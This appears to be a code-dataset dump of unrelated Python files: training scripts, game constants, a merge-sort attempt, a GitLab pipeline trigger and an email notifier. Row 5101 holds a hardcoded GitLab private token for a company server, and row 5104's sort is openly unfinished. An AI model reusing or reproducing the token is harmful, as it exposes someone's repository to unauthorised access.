index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
5,100 | 513d7e3c34cc9da030e2e018ad2db6972cf440dc | # Main Parameters
# Asset locations, relative to the working directory.
FONTS_PATH = "media/battle_font.ttf"
LEVELS_PATH = "media/levels"
GAME_MUSIC_PATH = "media/sounds/DOOM.ogg"
MENU_MUSIC_PATH = "media/sounds/ANewMorning.ogg"
# GAME Parameters
FONT_SIZE = 30
# Square board cells: 26 px (13 px base at 2x scale — presumably; confirm against sprites).
CELL_WIDTH = 13 * 2
CELL_HEIGHT = 13 * 2
CELL_SIZE = (CELL_WIDTH, CELL_HEIGHT)
FPS = 30
# The display is a 30 x 30 grid of cells.
DISPLAY_WIDTH = CELL_WIDTH * 30
DISPLAY_HEIGHT = CELL_HEIGHT * 30
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
# Respawn delay — unit looks like frames at FPS above; TODO confirm.
RESPAWN_TIME = 64
|
5,101 | c7f8731fe58a0e0065827b82bb4ad4af670541db | import gitlab
from core import settings

# SECURITY: a private token is committed to source control here — rotate it and
# load it from an environment variable or from `settings` instead.
gl = gitlab.Gitlab('https://gitlab.intecracy.com/', private_token='dxQyb5fNbLnBxvvpFjyc')
gl.auth()

# Look up the project configured for this deployment.
project = gl.projects.get(settings.projectID)
print(project)

# Fetch one specific pipeline and trigger its third job (a manual "play" action).
pipelines = project.pipelines.get(26452)
print(pipelines)  # BUG FIX: was a Python-2 `print pipelines` statement
pipelines_jobs = pipelines.jobs.list()[2]
jobs = project.jobs.get(pipelines_jobs.id, lazy=True)
print(jobs)  # BUG FIX: was a Python-2 `print jobs` statement
jobs.play()
|
5,102 | bc6c3383684cbba775d17f81ead3346fe1a01f90 | import os
import math
import time
from tqdm import tqdm
import torch
from torch import nn
import torch.optim as optim
from torch.nn import functional as F
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from nag.modules import Transformer, TransformerTorch
from nag.logger import LogManager, SummaryHelper
from nag.metric import BLEUMetric, DistinctNGram
from nag.vocab_helper import VocabBulider
from nag.utils import PadCollate, get_index, restore_best_state, init_seed
from nag.dataset import OpenSubDataset, IMSDBDataset
from nag.optimizer import RAdam
from nag.options import parse_args
from nag.criterion import similarity_regularization, LabelSmoothedCrossEntropyLoss
def train(epoch, model, dataloader, criterion, optimizer, scheduler):
    """Run one training epoch with gradient accumulation.

    Relies on module-level globals set in ``__main__``: ``opt``,
    ``ACCUMULATION``, ``bleu_metirc``, ``distinct_1``, ``distinct_2``,
    ``writer``, ``mylogger``, ``vocab_bulider``, ``opensub_dataset``.
    """
    global global_train_step
    model.train()
    total_loss = 0.
    bleu_score = 0.
    distinct_1_score, distinct_2_score = 0., 0.
    for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='train', total=len(opensub_dataset)//opt.realbatch):
        # Teacher forcing: decoder input drops the last token, gold drops the first.
        tgt_input = tgt[:, :-1]
        tgt_gold = tgt[:, 1:]
        tgt_lens = tgt_lens - 1
        decoder_output_probs, _ = model(
            src=src, tgt=tgt_input, src_lengths=src_lens, tgt_lengths=tgt_lens)
        # (batch, seq, vocab) -> (batch, vocab, seq): the layout the criterion expects.
        decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)
        out_seqs = torch.argmax(decoder_output_probs, dim=2)
        # loss — scaled so accumulated gradients average over ACCUMULATION micro-batches
        loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION
        loss.backward()
        total_loss += loss.item()
        # calculate metrics
        bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)
        distinct_1_score += distinct_1(out_seqs, tgt_lens)
        distinct_2_score += distinct_2(out_seqs, tgt_lens)
        # summary writer (un-scale the loss for logging)
        global_train_step += 1
        writer.log_loss(loss.item()*ACCUMULATION, mode='train')
        if (i+1) % ACCUMULATION == 0:
            # clip_grad_norm_(model.parameters(), max_norm=5)
            optimizer.step()
            optimizer.zero_grad()
            scheduler.step()
        if (i+1) % opt.logstep == 0:
            # Averages over the last `logstep` batches, then reset the accumulators.
            avg_loss = (total_loss / opt.logstep) * ACCUMULATION
            avg_bleu = bleu_score / opt.logstep
            avg_distinct_1 = distinct_1_score / opt.logstep
            avg_distinct_2 = distinct_2_score / opt.logstep
            mylogger.log(
                i, epoch, model, value=avg_loss, is_train=True,
                info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
            total_loss = 0.
            bleu_score = 0.
            distinct_1_score, distinct_2_score = 0., 0.
            show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2], vocab_bulider, global_train_step, mode='train')
def eval(epoch, model, dataloader, criterion, beam_size=2):
    """Decode the validation set (beam search if beam_size > 1, else greedy),
    write hypotheses to ./save/<model>/<model>_<epoch>, and log averaged metrics.

    NOTE(review): shadows the builtin ``eval``; kept because ``run_model``
    calls it by this name.
    """
    global global_valid_step
    model.eval()
    criterion.eval()
    total_loss = 0.
    bleu_score = 0.
    distinct_1_score, distinct_2_score = 0., 0.
    fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' + str(epoch)), 'w', encoding='utf-8')
    with torch.no_grad():
        for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='eval', total=len(imsdb_dataset)):
            # Decoding starts from a single <bos> token (batch size is 1 here).
            tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)
            tgt_gold = tgt[:, 1:]
            if beam_size > 1:
                output_seqs, output_probs = model.beam_search(
                    src=src, tgt_begin=tgt_begin, src_length=src_lens,
                    eos_token_id=vocab_bulider['<eos>'], beam_size=beam_size, max_length=tgt_lens.item())
            else:
                output_seqs, output_probs = model.greedy(
                    src=src, tgt_begin=tgt_begin, src_length=src_lens,
                    eos_token_id=vocab_bulider['<eos>'], max_length=tgt_lens.item())
            # Compare only the overlapping prefix of hypothesis and gold.
            min_len = min(tgt_gold.shape[1], output_seqs.shape[1])
            # loss
            loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1), tgt_gold[:, :min_len])
            total_loss += loss.item()
            # calculate metrics
            out_lens = [min_len]
            bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)
            distinct_1_score += distinct_1(output_seqs, out_lens)
            distinct_2_score += distinct_2(output_seqs, out_lens)
            # show sequence
            global_valid_step += 1
            fout.write(' '.join(convert_ids_to_seq(output_seqs[0], vocab_bulider)) + '\n')
            if (i+1) % opt.logstep == 0:
                show_gen_seq(src, output_seqs, out_lens, tgt_gold, vocab_bulider, global_valid_step, mode='valid')
    # summary
    # NOTE(review): divides by the last loop index `i` (= batch count - 1), not
    # the batch count — slight overestimate of the averages; confirm intent.
    avg_loss = total_loss / i
    avg_bleu = bleu_score / i
    avg_distinct_1 = distinct_1_score / i
    avg_distinct_2 = distinct_2_score / i
    writer.log_loss(avg_loss, mode='valid')
    mylogger.log(
        i, epoch, model, value=avg_bleu, is_train=False,
        info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
    fout.close()
def run_model(model, train_loader, eval_loader, niter, criterion, optimizer, scheduler):
    """Alternate one training and one evaluation pass per epoch, `niter` times."""
    mylogger.log_info('Running Model')
    for epoch_idx in range(niter):
        current_lr = optimizer.state_dict()["param_groups"][0]["lr"]
        mylogger.log_info(f'EPOCH: {epoch_idx}, lr: {current_lr}')
        train(epoch_idx, model, train_loader, criterion, optimizer, scheduler)
        eval(epoch_idx, model, eval_loader, criterion, beam_size=opt.beam)
def convert_ids_to_seq(id_seq, vocab_bulider):
    """Map a sequence of token ids back to their word strings."""
    return list(map(vocab_bulider.id_to_word, id_seq))
def show_gen_seq(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth, vocab_bulider, step, mode='train'):
    """Log source / prediction / reference triples to the summary writer.

    Sequences are truncated: input and reference at the first '<pad>' of the
    input, prediction at its reported length (or kept whole if length <= 0).
    Uses the module-level ``writer``.
    """
    for in_id, out_id, out_len, gold_id in zip(batch_in_seqs, batch_out_seqs, batch_out_lens, groud_truth):
        in_seq = convert_ids_to_seq(in_id, vocab_bulider)
        out_seq = convert_ids_to_seq(out_id[:out_len] if out_len > 0 else out_id, vocab_bulider)
        gold_seq = convert_ids_to_seq(gold_id, vocab_bulider)
        # NOTE(review): the reference is cut at the *input's* '<pad>' position
        # (get_index(in_seq, ...)), not its own — confirm this is intended.
        writer.add_text(tag=mode + '_post', sentence=' '.join(in_seq[:get_index(in_seq, '<pad>')]), global_step=step)
        writer.add_text(tag=mode + '_pred', sentence=' '.join(out_seq), global_step=step)
        writer.add_text(tag=mode + '_reps', sentence=' '.join(gold_seq[:get_index(in_seq, '<pad>')]), global_step=step)
if __name__ == '__main__':
    # Model/checkpoint name carries the launch time so runs don't collide.
    begin_time = time.strftime("%H%M%S", time.localtime())
    model_name = 'transformer' + begin_time
    opt = parse_args()
    device = "cuda" if torch.cuda.is_available() else "cpu"
    torch.cuda.set_device(opt.gpuid)
    init_seed(opt.manualSeed)
    # Gradient accumulation: effective batch = batchsize, per-step = realbatch.
    ACCUMULATION = opt.batchsize // opt.realbatch
    mylogger = LogManager(checkpoint_step=10,
                          save_dir='./save',
                          model_name=model_name,
                          log_file_name=model_name + '.log',
                          mode='max', device=device)
    mylogger.save_args(opt)
    writer = SummaryHelper(save_dir='./save', model_name=model_name)
    train_data_dir = './data/opensubtitles'
    # train_data_dir = './data/wmt15en-de'
    vocab_file_list = ['dialogue_length3_6.post']
    # vocab_file_list = ['all_de-en.bpe.post', 'all_de-en.bpe.response']
    vocab_bulider = VocabBulider(
        train_data_dir, src_files=vocab_file_list, ignore_unk_error=True,
        vocab_file='vocab.txt', min_count=opt.mincount, update=opt.update)
    print('most common 50:', vocab_bulider.most_common(50))
    mylogger.log_info('vocab size: %d' % len(vocab_bulider))
    # metircs
    bleu_metirc = BLEUMetric(vocab_bulider.id2vocab, ignore_smoothing_error=True)
    distinct_1 = DistinctNGram(ngram=1)
    distinct_2 = DistinctNGram(ngram=2)
    # train dataset and dataloader
    if opt.cotk:  # use dataset in paper 'cotk'
        # opensub_file_name_list = ['all_de-en.bpe']
        opensub_file_name_list = ['opensub_pair_dev', 'opensub_pair_test', 'opensub_pair_train']
        unk_token = None
    else:  # use dataset in paper 'Non-Autoregressive Neural Dialogue Generation'
        opensub_file_name_list = ['dialogue_length3_6']
        unk_token = 'UNknown'
    # BUG FIX: `unk_token` computed above was previously ignored — a literal
    # 'UNknown' was always passed, defeating the opt.cotk branch.
    opensub_dataset = OpenSubDataset(
        data_dir=train_data_dir, vocab_bulider=vocab_bulider,
        file_name_list=opensub_file_name_list, unk_token=unk_token,
        save_process=False, samples=opt.trainsamples, add_bos=True, add_eos=True)
    print(opensub_dataset.sample())
    opensub_dataloader = DataLoader(
        opensub_dataset, batch_size=opt.realbatch,
        collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
        shuffle=True, num_workers=opt.workers, drop_last=True)
    # dev set
    dev_data_dir = './data/imsdb'
    imsdb_file_name_list = ['imsdb_lower']
    # dev_data_dir = './data/wmt15en-de'
    # imsdb_file_name_list = ['newstest']
    imsdb_dataset = IMSDBDataset(
        data_dir=dev_data_dir, vocab_bulider=vocab_bulider,
        file_name_list=imsdb_file_name_list, save_process=False,
        samples=opt.validsamples, add_bos=True, add_eos=True)
    print(imsdb_dataset.sample())
    # batch_size=1: eval() decodes one sentence at a time.
    imsdb_dataloader = DataLoader(
        imsdb_dataset, batch_size=1,
        collate_fn=PadCollate(dim=0, pad_id=vocab_bulider.padid, device=device),
        shuffle=False, num_workers=opt.workers, drop_last=True)
    # model definition: custom implementation vs. torch.nn.Transformer wrapper
    if opt.mine:
        model = Transformer(
            ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
            num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
            dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
            use_src_mask=False, use_tgt_mask=True, use_memory_mask=False,
            activation='relu', use_vocab_attn=False, use_pos_attn=False,
            relative_clip=0, highway=False, device=device, max_sent_length=32,
            share_input_output_embedding=False, share_encoder_decoder_embedding=True,
            share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
    else:
        model = TransformerTorch(
            ntoken=len(vocab_bulider), d_model=opt.embedsize, nhead=opt.nhead,
            num_encoder_layers=opt.encoderlayer, num_decoder_layers=opt.decoderlayer,
            dim_feedforward=opt.feedforward, postnorm=True, dropout=opt.dropout, gumbels=opt.gumbels,
            use_src_mask=False, use_tgt_mask=False, use_memory_mask=False,
            activation='relu', use_vocab_attn=False, use_pos_attn=False,
            relative_clip=0, highway=False, device=device, max_sent_length=32,
            share_input_output_embedding=False, share_encoder_decoder_embedding=True,
            share_vocab_embedding=True, fix_pos_encoding=opt.fix).to(device)
    model.show_graph()
    if opt.half:
        model = model.half()
    if opt.ft:
        # Fine-tuning: restore the best checkpoint before continuing.
        model = restore_best_state(model, opt.ckpt, save_dir='./save', device=model.device)
    # optimizer and scheduler
    if opt.warmup:
        # Noam-style schedule: lr grows linearly for warmup_step, then ~1/sqrt(step).
        optimizer = RAdam(
            filter(lambda p: p.requires_grad, model.parameters()),
            lr=1., betas=(opt.beta1, opt.beta2), eps=opt.eps)
        rate_ratio = 1. / math.sqrt(opt.embedsize)
        # top_lr = 1 / sqrt(d_model * warmup_step) at step == warmup_step
        scheduler = optim.lr_scheduler.LambdaLR(
            optimizer,
            lr_lambda=lambda step: rate_ratio * min(1. / math.sqrt(step+1), step*(opt.warmup_step**(-1.5))))
    else:
        optimizer = RAdam(
            filter(lambda p: p.requires_grad, model.parameters()),
            lr=opt.lr, betas=(opt.beta1, opt.beta2), eps=opt.eps,
            weight_decay=opt.weight_decay)
        scheduler = optim.lr_scheduler.StepLR(
            optimizer, step_size=opt.schedulerstep, gamma=opt.gamma)
    # loss function
    # criterion = nn.CrossEntropyLoss(ignore_index=vocab_bulider.padid) # for Transformer
    criterion = LabelSmoothedCrossEntropyLoss(eps=0.1, ignore_index=vocab_bulider.padid)
    # run model
    global_train_step, global_valid_step = 0, 0
    run_model(
        model, opensub_dataloader, imsdb_dataloader,
        opt.niter, criterion, optimizer, scheduler)
    writer.close()
|
5,103 | 07e875a24d0e63ef596db57c4ec402f768225eec | def printBoard(board,pref):
    # Render an 8-column board as an ASCII grid; every printed line is
    # prefixed with `pref` (e.g. indentation or a player label).
    border = "+----+----+----+----+----+----+----+----+"
    for row in board:
        print(pref,border)
        cells ="|"
        for cell in row:
            if cell == 0:
                # Empty square: two spaces keep the cell width constant.
                cell = "  "
            elif cell in range(1,10):
                # Zero-pad single digits so every cell is two characters wide.
                cell = "0{}".format(cell)
            cells +=" {} ".format(cell)
            cells +="|"
        print(pref,cells )
    # Closing border after the last row.
    print(pref,border)
|
5,104 | fb5508b1b5aa36c4921358d6ca7f96fc7d565241 | # https://www.acmicpc.net/problem/2751
# n 개 수가 주어짐
# 목표 오름차순정렬
# 첫 줄 n개
# 둘째줄부터 n개의 줄에 수가 주어짐 세로로
# 출력 오름차순 정렬한 결과를 한 줄에 하나씩 출력한다?
# BOJ 2751: read n numbers, one per line, and print them sorted ascending.
n=int(input())
n_list=[int(input()) for _ in range(n)]
# print(n_list)
nn_list = []
# maintain two indexes, one per half of the list
mid_idx = len(n_list) //2
left_idx = 0
right_idx = mid_idx +1
# NOTE(review): this is an unfinished merge step of merge sort — the halves are
# never sorted first, the loop stops at the first equal pair, and leftovers of
# either half are dropped. It does not solve the stated problem yet.
while left_idx <= mid_idx and right_idx <= n-1:
    # nn_list = []
    if n_list[left_idx] < n_list[right_idx]:
        nn_list.append(n_list[left_idx])
        left_idx += 1
    elif n_list[left_idx] > n_list[right_idx]:
        nn_list.append(n_list[right_idx])
        right_idx+=1
    else:
        break
print(nn_list, end='\n')
# Problem insight: sorting bottoms out when one value remains — if start_idx == end_idx,
# return; remember that a single-element list is what gets passed back up.
# During merge_sort:
# combined_list = []
# while f[fidx] <= len(f) ... — neither `or` nor `and` worked as the loop condition
# f < b
# the smaller value is chosen
# append it
# advance the index of the list the smaller value came from by 1
# the opposite case works the same way
# once the front list is exhausted, the back list may still hold unmerged values
# whichever of front/back finishes first leaves the other (possibly empty) list
# append the remaining values of the other list:
# print(combined_list = combined_list + f[fidx:] + b[bidx:]) shows the behavior
# return combined_list = combined_list + f[fidx:] + b[bidx:]
# 탑 다운 방식 |
5,105 | 4bb006e2e457f5b11157dacb43fe94c8b400f146 | #!/usr/bin/python
import sys
class Generator:
    """Linear-congruential generator over the Mersenne prime 2**31 - 1.

    ``iterate`` keeps stepping until the current value is an exact multiple
    of ``multiple`` (Advent of Code 2017, day 15 part 2 semantics).
    """

    MODULUS = 2147483647  # 2**31 - 1

    def __init__(self, seed, factor, multiple):
        self.value = seed
        self.factor = factor
        self.multiple = multiple

    def iterate(self):
        """Advance to the next value divisible by ``multiple`` and return it."""
        while True:
            self.value = (self.value * self.factor) % Generator.MODULUS
            if self.value % self.multiple == 0:
                return self.value
# Read the input: the two generator seeds come from the command line.
seed_a = int(sys.argv[1])
seed_b = int(sys.argv[2])
gen_a = Generator(seed_a, 16807, 4)
gen_b = Generator(seed_b, 48271, 8)
matches = 0
# Loop-invariant mask for the low 16 bits, hoisted out of the loop.
lowest16 = 2 ** 16 - 1
# Count how many of 5 million paired samples agree on their low 16 bits.
for i in range(0, 5000000):
    val_a = gen_a.iterate()
    val_b = gen_b.iterate()
    if (val_a & lowest16) == (val_b & lowest16):
        matches += 1
print(matches)  # BUG FIX: was a Python-2 `print matches` statement
|
5,106 | ed246f2887f19ccf922a4d386918f0f0771fb443 | # -*- coding: utf-8 -*-
"""
Created on Sat Jun 23 20:33:08 2018
@author: ashima.garg
"""
import tensorflow as tf
class Layer():
    """Base layer: holds weight/bias variables and an abstract forward pass."""
    def __init__(self, shape, mean, stddev):
        # Weights ~ N(mean, stddev); biases start at zero, one per output
        # channel (shape[-1]).
        self.weights = tf.Variable(tf.random_normal(shape=shape, mean=mean, stddev=stddev))
        self.biases = tf.Variable(tf.zeros(shape=[shape[-1]]))
    def feed_forward(self, input_data, stride=None):
        # Subclasses build the actual op graph.
        raise NotImplementedError
class Convolution_Layer(Layer):
    """2-D convolution (VALID padding) followed by bias add and ReLU."""
    def __init__(self, shape, mean, stddev):
        super(Convolution_Layer, self).__init__(shape, mean, stddev)
    def feed_forward(self, input_data, stride):
        conv = tf.nn.conv2d(input_data, self.weights, stride, padding="VALID")
        output_data = tf.nn.relu(tf.nn.bias_add(conv, self.biases))
        return output_data
class Output_Layer(Layer):
    """Final 2-D convolution with bias but no activation (linear output)."""
    def __init__(self, shape, mean, stddev):
        super(Output_Layer, self).__init__(shape, mean, stddev)
    def feed_forward(self, input_data, stride):
        output_data = tf.nn.bias_add(tf.nn.conv2d(input_data, self.weights, stride, padding="VALID"), self.biases)
        return output_data
|
5,107 | f57490c8f4a5ba76824c3b41eb18905eb2213c23 | import pandas as pd
import os
"""
This code relies heavily on the form of the data. Namely it will fail if
the authors of the same book are not comma separated. It will also be inaccurate
or even fail if the same author for different books is not spelt in exactly the
same way.
"""
loc = r'C:\Users\james\OneDrive\Documents\University\2017-18 Southampton\Data Mining\Group Coursework\Data'
#path = os.path.join(loc, r'Sample\new_books_data.csv')
path = os.path.join(loc, r'Processed_Data\new_books_data.csv')
books_data = pd.read_csv(path)
def split(string):
    """Split a ", "-separated string into a list of parts.

    The input is expected to be comma separated with a single space after
    each comma. Malformed input (no space after a comma, trailing comma)
    produces the same quirky results as the original hand-rolled parser
    rather than raising.
    """
    names = []
    start = 0
    final = len(string) - 1
    for position, character in enumerate(string):
        if position == final:
            # Last character: take everything from the current start, inclusive.
            names.append(string[start:position + 1])
            start = position + 2
        elif character == ',':
            names.append(string[start:position])
            start = position + 2  # skip the comma and the following space
    return names
# Build the author -> [book ids] mapping in ONE pass over the table instead of
# the original scan-per-author (O(authors x books)) double loop. Dict insertion
# order preserves the original "first appearance" ordering of authors, and
# per-author book lists stay in row order, so the output CSV is identical.
author_to_books = {}
length = len(books_data.index)
count = 0
for i in range(length):
    if (count % 1000 == 0):
        print(str(count) + '/' + str(length))
    book_id = books_data['goodreads_book_id'][i]
    seen_in_row = set()
    for author in split(books_data['authors'][i]):
        # Guard against the same author appearing twice in one row, which the
        # original membership checks also collapsed to a single entry.
        if author in seen_in_row:
            continue
        seen_in_row.add(author)
        author_to_books.setdefault(author, []).append(book_id)
    count += 1
unique_authors = list(author_to_books.keys())
authors_books = list(author_to_books.values())
d = {'author': unique_authors, 'book_id': authors_books}
books_by_author = pd.DataFrame(data=d)
#write_path = os.path.join(loc, r'Sample\books_by_author.csv')
write_path = os.path.join(loc, r'Processed_Data\books_by_author.csv')
books_by_author.to_csv(write_path, index=False)
|
5,108 | 56d90835e64bd80fd9a6bb3a9b414e154d314d4a |
def get_analyse(curse):
    '''
    Compute per-strategy performance statistics from an equity-curve table.

    `curse` is a DataFrame indexed by date with one column per strategy, each
    column holding that strategy's net value (starting around 1.0). Weekly
    observations are assumed — the factor 52 annualises returns/volatility.

    Returns a DataFrame indexed by strategy with columns:
    最大回撤 (max drawdown %), 年化收益率 (annualised return %), Calmar比率,
    年波动率 (annualised volatility %), 夏普比率 (no risk-free adjustment).
    '''
    # BUG FIX: the original module referenced np/pd without importing them.
    import numpy as np
    import pandas as pd

    qf_drawdown = []
    qf_yeild = []
    qf_std = []
    date = curse.index
    y = curse.copy()
    for i in curse.columns:
        # Running maximum of the curve up to each date.
        y["max2here"] = y[i].expanding().max()
        # Fraction of the historical peak retained at each date.
        y["dd2here"] = y[i] / y["max2here"]
        # Smallest retained fraction = deepest drawdown. (Removed the unused
        # `end_date` lookup from the original.)
        remain = y.sort_values(by="dd2here").iloc[0]["dd2here"]
        drawdown = round((1 - remain) * 100, 2)
        qf_drawdown.append(drawdown)
        daylenth = len(date) - 1
        # Annualised return assuming 52 observations per year.
        yeild = round(((y[i][daylenth]) ** (52 / daylenth) - 1) * 100, 2)
        qf_yeild.append(yeild)
        # Annualised volatility of period-over-period returns.
        r1 = y[i] / y[i].shift(1) - 1
        std = round(np.nanstd(r1) * 52 ** 0.5 * 100, 2)
        qf_std.append(std)
    drawdown = pd.DataFrame(qf_drawdown, index=curse.columns, columns=["最大回撤"])
    drawdown["年化收益率"] = qf_yeild
    drawdown["Calmar比率"] = drawdown["年化收益率"] / drawdown["最大回撤"]
    drawdown["年波动率"] = qf_std
    drawdown["夏普比率"] = drawdown["年化收益率"] / drawdown["年波动率"]
    return drawdown
5,109 | b310c35b781e3221e2dacc7717ed77e20001bafa | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon May 6 10:05:25 2019
@author: MCA
"""
import smtplib, ssl
from email import encoders
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
import os,sys
import time
def loadFiles(subdir, filetype):
    """
    Return the names of all files under `subdir` (relative to this script's
    directory, searched recursively) whose name ends with `filetype`.

    example:
        dirs = ["dir1", "dir2"]
        file_type = ".dat"
        files = loadFiles(dirs[0], file_type)
    """
    dirname = os.path.dirname(__file__)
    path = os.path.join(dirname, (subdir + "/"))
    matching_names = []
    for root, dirs, files in os.walk(path):
        for filename in files:
            # endswith() replaces the original manual slice comparison; the
            # unused full-path accumulator list was dropped.
            if filename.endswith(filetype):
                matching_names.append(filename)
    return matching_names
def sendMail(filename):
    """Email `filename` as an attachment to the configured address.

    Connects over STARTTLS. A missing attachment file is reported but the
    (attachment-less) message is still sent, matching the original
    best-effort behaviour.
    """
    smtp_server = "smtp.seznam.cz"
    port = 25  # For starttls
    sender_email = "xxx@email.cz"
    # SECURITY: placeholder password kept in source — load it from an
    # environment variable or a secret store before real use.
    password = "xxxx"
    # Create a secure SSL context
    context = ssl.create_default_context()
    receiver_email = sender_email
    # compose the email
    message = MIMEMultipart("alternative")
    message["Subject"] = ("analysis status check: " + str(filename))
    message["From"] = sender_email
    message["To"] = receiver_email
    text = "analysis status check"
    part1 = MIMEText(text, "plain")
    message.attach(part1)
    # attach the file
    try:
        with open(filename, "rb") as attachment:
            # application/octet-stream: clients usually offer it as a download.
            file = MIMEBase("application", "octet-stream")
            file.set_payload(attachment.read())
        encoders.encode_base64(file)
        # BUG FIX: the header previously contained a literal placeholder
        # instead of the actual file name.
        file.add_header(
            "Content-Disposition",
            f"attachment; filename= {filename}",
        )
        message.attach(file)
    except OSError:  # narrowed from a bare except
        print("file not found")
    # Try to log in to server and send email
    server = None
    try:
        server = smtplib.SMTP(smtp_server, port)
        server.ehlo()  # Can be omitted
        server.starttls(context=context)  # Secure the connection
        server.ehlo()  # Can be omitted
        server.login(sender_email, password)
        print("logged in")
        server.sendmail(sender_email, receiver_email, message.as_string())
        print("mail sent")
    except Exception as e:
        # Print any error messages to stdout
        print(e)
    finally:
        # BUG FIX: the original raised NameError here when SMTP() itself failed.
        if server is not None:
            server.quit()
#--------------------------------------------------------------------------------------
if __name__ == "__main__":
    run = True
    directory = "/folder/folder"
    fileType = ".xxx"
    name = "xxxxxx_xxx__xxx.xxx"
    # Poll every 5 minutes until the result file appears and contains the
    # completion marker, then mail it once and exit.
    while run == True:
        names = loadFiles(directory, fileType)
        print("running")
        if name in names:
            print("file found:", name)
            # BUG FIX: `with` closes the file handle the original leaked.
            with open(name, "r") as f:
                for line in f:
                    if "THE ANALYSIS HAS" in line:
                        sendMail(name)
                        print("file sent")
                        run = False
            print("done")
            sys.exit()
        time.sleep(300)
|
5,110 | 00dbcae2d3941c9ef4c8b6753b8f6f7a46417400 | import torch
import torch.nn as nn
import torch.optim as optim
import torchtext
import absl.flags
import absl.app
import pickle
import yaml
import numpy as np
from tqdm import tqdm
from core import model
import core.dnc.explanation
from core import functions
from core.config import ControllerConfig, MemoryConfig, TrainingConfig
# user flags
FLAGS = absl.flags.FLAGS
absl.flags.DEFINE_string("path_model", None, "Path of the trained model")
absl.flags.DEFINE_string("path_training", None, "Path where is stored the csv dataset")
absl.flags.DEFINE_string("path_val", None, "Path where is stored the csv dataset")
absl.flags.DEFINE_integer("top_k", 25, "Number of read cells considered for each step")
absl.flags.DEFINE_boolean("use_surrogate", False, " Whether to extract surrogate ground truth for explanation")
absl.flags.mark_flag_as_required("path_model")
absl.flags.mark_flag_as_required("path_training")
absl.flags.mark_flag_as_required("path_val")
def run_explanations(network, explanation_module, data_iterator):
    """Score explanation quality on a dataset.

    For each element whose surrogate ground truths (sgt) disagree, checks
    whether the network's prediction matches the sgt of the best-ranked and
    worst-ranked memory cell. Returns (best_accuracy, worst_accuracy),
    both computed over the "covered" (disagreeing) subset only.
    """
    network.eval()
    best_accuracy = 0
    worst_accuracy = 0
    best_correct = 0
    worst_correct = 0
    covered = 0
    total = 0
    #print stuff
    pbar = tqdm()
    pbar.reset(total=len(data_iterator))
    for _, data in enumerate(data_iterator):
        (_, p1, p2, p3, p4, a1, a2), y = data
        y = y - 1 # gold index
        # Story = the four premise sentences concatenated along dim 1.
        story = torch.cat((p1,p2,p3,p4),1)
        background = [p1,p2,p3,p4]
        answers = [a1,a2]
        total += y.size(0)
        #get output
        with torch.no_grad():
            outcome, rh, wh = network(story,[a1,a2])
        predicted = torch.argmax(outcome, 1)
        # Re-run the explanation machinery one element at a time.
        for index_elem in range(p1.shape[0]):
            elem_background = [p1[index_elem:index_elem+1,:], p2[index_elem:index_elem+1,:],p3[index_elem:index_elem+1,:],p4[index_elem:index_elem+1,:]]
            elem_answers = [a1[index_elem:index_elem+1,:], a2[index_elem:index_elem+1,:]]
            elem_predicted = predicted[index_elem]
            sgt = explanation_module.get_sgt(network, elem_background,elem_answers )
            # case where there are contraddictory surrogate ground truth
            if len(set(sgt)) > 1:
                covered += 1
                rank, _ = explanation_module.get_rank(elem_background,wh[0][0],rh[elem_predicted.item()+1][0] )
                # rank entries are 1-based indices into sgt.
                best_prediction = sgt[rank[0]-1]
                best_correct += (elem_predicted == best_prediction).sum().item()
                worst_prediction = sgt[rank[-1]-1]
                worst_correct += (elem_predicted == worst_prediction).sum().item()
        # Guarded division: *_correct > 0 implies covered > 0.
        best_accuracy = float(best_correct / covered) if best_correct > 0 else 0
        worst_accuracy = float(worst_correct / covered) if worst_correct > 0 else 0
        #print
        pbar.set_postfix({'Best':best_accuracy,'Worst':worst_accuracy,
                          'cov':covered/total})
        pbar.update()
    pbar.close()
    return best_accuracy, worst_accuracy
def run_training_epoch(network, data_iterator, loss_function, optimizer, max_grad_norm):
    """Train for one epoch; returns (final running accuracy, mean batch loss)."""
    network.train()
    # init cumulative variables
    accuracy = 0
    correct = 0
    total = 0
    losses = []
    # print utility
    pbar = tqdm()
    pbar.reset(total=len(data_iterator))
    #data_iterator.init_epoch()
    for _, data in enumerate(data_iterator):
        optimizer.zero_grad()
        (_, p1, p2, p3, p4, a1, a2), y = data
        y = y - 1 # gold index
        story = torch.cat((p1,p2,p3,p4),1)
        # get output
        outcome, _, _ = network(story,[a1,a2])
        predicted = torch.argmax(outcome, 1)
        # get loss
        loss = loss_function(outcome,y)
        loss.backward()
        losses.append(loss.item())
        # update metrics
        correct += (predicted == y).sum().item()
        total += y.size(0)
        accuracy = float(correct / total) if correct > 0 else 0
        # update weights (clip first to keep DNC training stable)
        nn.utils.clip_grad_norm_(network.parameters(), max_norm=max_grad_norm)
        optimizer.step()
        pbar.set_postfix({'Acc':accuracy})
        #print
        pbar.update()
